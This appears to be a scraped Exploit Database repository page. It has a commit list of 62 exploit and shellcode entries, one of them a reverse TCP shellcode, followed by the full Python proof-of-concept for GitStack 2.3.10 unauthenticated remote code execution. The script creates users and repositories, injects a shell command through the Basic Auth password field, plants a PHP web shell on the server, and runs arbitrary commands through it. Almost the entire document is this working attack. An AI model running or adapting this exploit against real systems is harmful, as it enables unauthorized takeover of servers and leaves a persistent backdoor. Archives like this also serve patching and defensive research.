bfebc3fa5a
62 changes to exploits/shellcodes macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in 'AppleIntelCapriController::getDisplayPipeCapability' Peercast < 0.1211 - Format String Trillian Pro < 2.01 - Design Error dbPowerAmp < 2.0/10.0 - Buffer Overflow PsychoStats < 2.2.4 Beta - Cross Site Scripting MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution GitStack 2.3.10 - Unauthenticated Remote Code Execution Invision Power Top Site List < 2.0 Alpha 3 - SQL Injection (PoC) Invision Power Board (IP.Board) < 2.0 Alpha 3 - SQL Injection (PoC) Aardvark Topsites < 4.1.0 - Multiple Vulnerabilities DUWare Multiple Products - Multiple Vulnerabilities AutoRank PHP < 2.0.4 - SQL Injection (PoC) ASPapp Multiple Products - Multiple Vulnerabilities osCommerce < 2.2-MS2 - Multiple Vulnerabilities PostNuke < 0.726 Phoenix - Multiple Vulnerabilities MetaDot < 5.6.5.4b5 - Multiple Vulnerabilities phpGedView < 2.65 beta 5 - Multiple Vulnerabilities phpShop < 0.6.1-b - Multiple Vulnerabilities Invision Power Board (IP.Board) < 1.3 - SQL Injection phpBB < 2.0.6d - Cross Site Scripting Phorum < 5.0.3 Beta - Cross Site Scripting vBulletin < 3.0.0 RC4 - Cross Site Scripting Mambo < 4.5 - Multiple Vulnerabilities phpBB < 2.0.7a - Multiple Vulnerabilities Invision Power Top Site List < 1.1 RC 2 - SQL Injection Invision Gallery < 1.0.1 - SQL Injection PhotoPost < 4.6 - Multiple Vulnerabilities TikiWiki < 1.8.1 - Multiple Vulnerabilities phpBugTracker < 0.9.1 - Multiple Vulnerabilities OpenBB < 1.0.6 - Multiple Vulnerabilities PHPX < 3.26 - Multiple Vulnerabilities Invision Power Board (IP.Board) < 1.3.1 - Design Error HelpCenter Live! < 1.2.7 - Multiple Vulnerabilities LiveWorld Multiple Products - Cross Site Scripting WHM.AutoPilot < 2.4.6.5 - Multiple Vulnerabilities PHP-Calendar < 0.10.1 - Arbitrary File Inclusion PhotoPost Classifieds < 2.01 - Multiple Vulnerabilities ReviewPost < 2.84 - Multiple Vulnerabilities PhotoPost < 4.85 - Multiple Vulnerabilities AZBB < 1.0.07d - Multiple Vulnerabilities Invision Power Board (IP.Board) < 2.0.3 - Multiple Vulnerabilities Burning Board < 2.3.1 - SQL Injection XOOPS < 2.0.11 - Multiple Vulnerabilities PEAR XML_RPC < 1.3.0 - Remote Code Execution PHPXMLRPC < 1.1 - Remote Code Execution SquirrelMail < 1.4.5-RC1 - Arbitrary Variable Overwrite XPCOM - Race Condition ADOdb < 4.71 - Cross Site Scripting Geeklog < 1.4.0 - Multiple Vulnerabilities PEAR LiveUser < 0.16.8 - Arbitrary File Access Mambo < 4.5.3h - Multiple Vulnerabilities phpRPC < 0.7 - Remote Code Execution Gallery 2 < 2.0.2 - Multiple Vulnerabilities PHPLib < 7.4 - SQL Injection SquirrelMail < 1.4.7 - Arbitrary Variable Overwrite CubeCart < 3.0.12 - Multiple Vulnerabilities Claroline < 1.7.7 - Arbitrary File Inclusion X-Cart < 4.1.3 - Arbitrary Variable Overwrite Mambo < 4.5.4 - SQL Injection Synology Photostation < 6.7.2-3429 - Multiple Vulnerabilities D-Link DNS-343 ShareCenter < 1.05 - Command Injection D-Link DNS-325 ShareCenter < 1.05B03 - Multiple Vulnerabilities Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)
98 lines
No EOL
3.2 KiB
Python
Executable file
98 lines
No EOL
3.2 KiB
Python
Executable file
# Exploit: GitStack 2.3.10 Unauthenticated Remote Code Execution
|
|
# Date: 18.01.2018
|
|
# Software Link: https://gitstack.com/
|
|
# Exploit Author: Kacper Szurek
|
|
# Contact: https://twitter.com/KacperSzurek
|
|
# Website: https://security.szurek.pl/
|
|
# Category: remote
|
|
#
|
|
#1. Description
|
|
#
|
|
#$_SERVER['PHP_AUTH_PW'] is directly passed to exec function.
|
|
#
|
|
#https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html
|
|
#
|
|
#2. Proof of Concept
|
|
#
|
|
import requests
|
|
from requests.auth import HTTPBasicAuth
|
|
import os
|
|
import sys
|
|
|
|
ip = '192.168.1.102'
|
|
|
|
# What command you want to execute
|
|
command = "whoami"
|
|
|
|
repository = 'rce'
|
|
username = 'rce'
|
|
password = 'rce'
|
|
csrf_token = 'token'
|
|
|
|
user_list = []
|
|
|
|
print "[+] Get user list"
|
|
try:
|
|
r = requests.get("http://{}/rest/user/".format(ip))
|
|
user_list = r.json()
|
|
user_list.remove('everyone')
|
|
except:
|
|
pass
|
|
|
|
if len(user_list) > 0:
|
|
username = user_list[0]
|
|
print "[+] Found user {}".format(username)
|
|
else:
|
|
r = requests.post("http://{}/rest/user/".format(ip), data={'username' : username, 'password' : password})
|
|
print "[+] Create user"
|
|
|
|
if not "User created" in r.text and not "User already exist" in r.text:
|
|
print "[-] Cannot create user"
|
|
os._exit(0)
|
|
|
|
r = requests.get("http://{}/rest/settings/general/webinterface/".format(ip))
|
|
if "true" in r.text:
|
|
print "[+] Web repository already enabled"
|
|
else:
|
|
print "[+] Enable web repository"
|
|
r = requests.put("http://{}/rest/settings/general/webinterface/".format(ip), data='{"enabled" : "true"}')
|
|
if not "Web interface successfully enabled" in r.text:
|
|
print "[-] Cannot enable web interface"
|
|
os._exit(0)
|
|
|
|
print "[+] Get repositories list"
|
|
r = requests.get("http://{}/rest/repository/".format(ip))
|
|
repository_list = r.json()
|
|
|
|
if len(repository_list) > 0:
|
|
repository = repository_list[0]['name']
|
|
print "[+] Found repository {}".format(repository)
|
|
else:
|
|
print "[+] Create repository"
|
|
|
|
r = requests.post("http://{}/rest/repository/".format(ip), cookies={'csrftoken' : csrf_token}, data={'name' : repository, 'csrfmiddlewaretoken' : csrf_token})
|
|
if not "The repository has been successfully created" in r.text and not "Repository already exist" in r.text:
|
|
print "[-] Cannot create repository"
|
|
os._exit(0)
|
|
|
|
print "[+] Add user to repository"
|
|
r = requests.post("http://{}/rest/repository/{}/user/{}/".format(ip, repository, username))
|
|
|
|
if not "added to" in r.text and not "has already" in r.text:
|
|
print "[-] Cannot add user to repository"
|
|
os._exit(0)
|
|
|
|
print "[+] Disable access for anyone"
|
|
r = requests.delete("http://{}/rest/repository/{}/user/{}/".format(ip, repository, "everyone"))
|
|
|
|
if not "everyone removed from rce" in r.text and not "not in list" in r.text:
|
|
print "[-] Cannot remove access for anyone"
|
|
os._exit(0)
|
|
|
|
print "[+] Create backdoor in PHP"
|
|
r = requests.get('http://{}/web/index.php?p={}.git&a=summary'.format(ip, repository), auth=HTTPBasicAuth(username, 'p && echo "<?php system($_POST[\'a\']); ?>" > c:\GitStack\gitphp\exploit.php'))
|
|
print r.text.encode(sys.stdout.encoding, errors='replace')
|
|
|
|
print "[+] Execute command"
|
|
r = requests.post("http://{}/web/exploit.php".format(ip), data={'a' : command})
|
|
print r.text.encode(sys.stdout.encoding, errors='replace') |